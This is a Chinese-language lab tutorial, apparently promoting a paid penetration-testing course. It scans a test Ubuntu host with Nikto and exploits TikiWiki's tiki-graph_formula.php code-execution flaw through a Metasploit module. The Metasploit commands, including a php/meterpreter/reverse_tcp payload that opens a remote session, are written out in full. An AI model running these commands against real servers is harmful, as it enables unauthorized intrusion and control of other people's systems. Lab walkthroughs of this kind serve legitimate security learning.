所有技術僅僅用於安全測試,如需學習完整黑客技術,可以點擊下方的《白帽黑客kali滲透指南》視頻專欄教程,新手小白也能從入門到白帽實戰!
什麼是TikiWiki
TikiWiki 是一個強大的基於Web的協作工具。TikiWiki內置了很多功能選項,當您需要某個功能時可以很方便的將該功能激活。TikiWiki的設計架構是面向全世界範圍的、清爽以及易擴展的。TikiWiki除了擁有當前幾個優秀的Wiki的所有功能外,並且還提供很多其他很有價值的功能。您可以通過 TikiWiki構建成論壇系統、聊天室、投票系統、客戶支持網站等。
使用nikto web漏洞掃描
Nikto是一款開源的網頁web服務器,它可以對網頁服務器進行全面的多種掃描,包含超過3300種有潛在危險的文件/CGIs,超過625種服務器版本,超過230種特定服務器問題。這是一款非常棒的工具。
測試環境:
<code>Kali 攻擊機 192.168.31.251 Ubuntu 靶機 192.168.31.164 Nikto kali自帶/<code>
掃描ubuntu的web服務器
Kali終端下,輸入:
<code>nikto -h 192.168.31.164,掃描如下/<code>
分析:紅色部分說明,存在tikiwiki路徑,這是一個web應用的程序的網址。tiki-graph_formula.php這個php類型的網址被發現,其實這個網址執行的時候存在允許惡意腳本代碼執行的漏洞!後面的"allows remote attackers to execute arbitrary PHP code"這一行也說明了存在遠程php代碼執行漏洞攻擊!
tikiwiki漏洞利用
我們這裡使用metasploit滲透利用框架!
開啟metasploit
搜索"tiki-graph_formula.php"exploit(利用模塊)
配置該exploit模塊的參數
接下來配置監聽回連的php載荷
執行,獲取meterpreter會話,控制ubuntu靶機
Metasploit下:
<code>msf5 > search tiki-graph_formula.php use exploit/unix/webapp/tikiwiki_graph_formula_exec show options (查看設置選項)/<code>
<code>set RHOST 192.168.31.164 設置ubuntu的目標ip set payload php/meterpreter/reverse_tcp 設置kali在接收回連後發送到目標的php載荷 run (執行)/<code>
相信已經看到了meterpreter會話,接下來可以使用 "?"查看可以用於控制ubuntu的命令了:
比如:操作文件系統的命令
比如:查看對方網絡、使用系統命令控制靶機等
總的來說,對於滲透者來說,這些命令夠用了!
到目前為止,我們通過web應用tikiwiki的一個網址存在的graph_formula.php腳本代碼執行漏洞,成功拿下了目標linux的服務器權限!
關注我>>
@小白嘿客 ,我會持續更新更多白帽黑客、網絡安全技術免費文章。完整課程,可以點擊>>《白帽黑客kali滲透實戰指南》進入學習,你也能小白變黑客大神!給個贊,轉發,讓更多人看到,加入學習吧!
